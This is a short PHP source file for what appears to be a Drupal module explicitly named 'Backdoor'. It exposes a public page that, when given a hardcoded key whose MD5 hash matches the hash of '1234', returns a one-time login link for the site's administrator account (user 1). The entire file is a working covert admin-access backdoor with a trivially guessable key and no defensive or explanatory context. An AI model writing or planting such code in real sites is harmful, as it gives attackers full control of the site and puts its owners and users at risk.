<?php

function backdoor_menu(){
	$items = array();

	$items['backdoor'] = array(
		'title' => 'Backdoor page',
		'description' => 'Here generating one time link for login',
		'page callback' => 'backdoor',
		'access callback' => 'access_backdoor_page',
		'type' => MENU_NORMAL_ITEM,
	);

	$items['admin/config/administration/backdoor'] = array(
		'title' => 'Backdoor settings',
		'description' => 'Администрирование модуля Backdoor',
		'page callback' => 'admin_page_backdoor',
		'access arguments' => array('administer site configuration'),
		'type' => MENU_NORMAL_ITEM,
	);

	return $items;
}

function access_backdoor_page (){
	if(isset($_GET['key'])){
		$key = md5($_GET['key']);
		if($key == '81dc9bdb52d04dc20036dbd8313ed055'){
			return TRUE;
		}
	}
}

function backdoor (){
	$user = user_load(1);
	return user_pass_reset_url($user);
}

function admin_page_backdoor (){

	return md5(1234);
}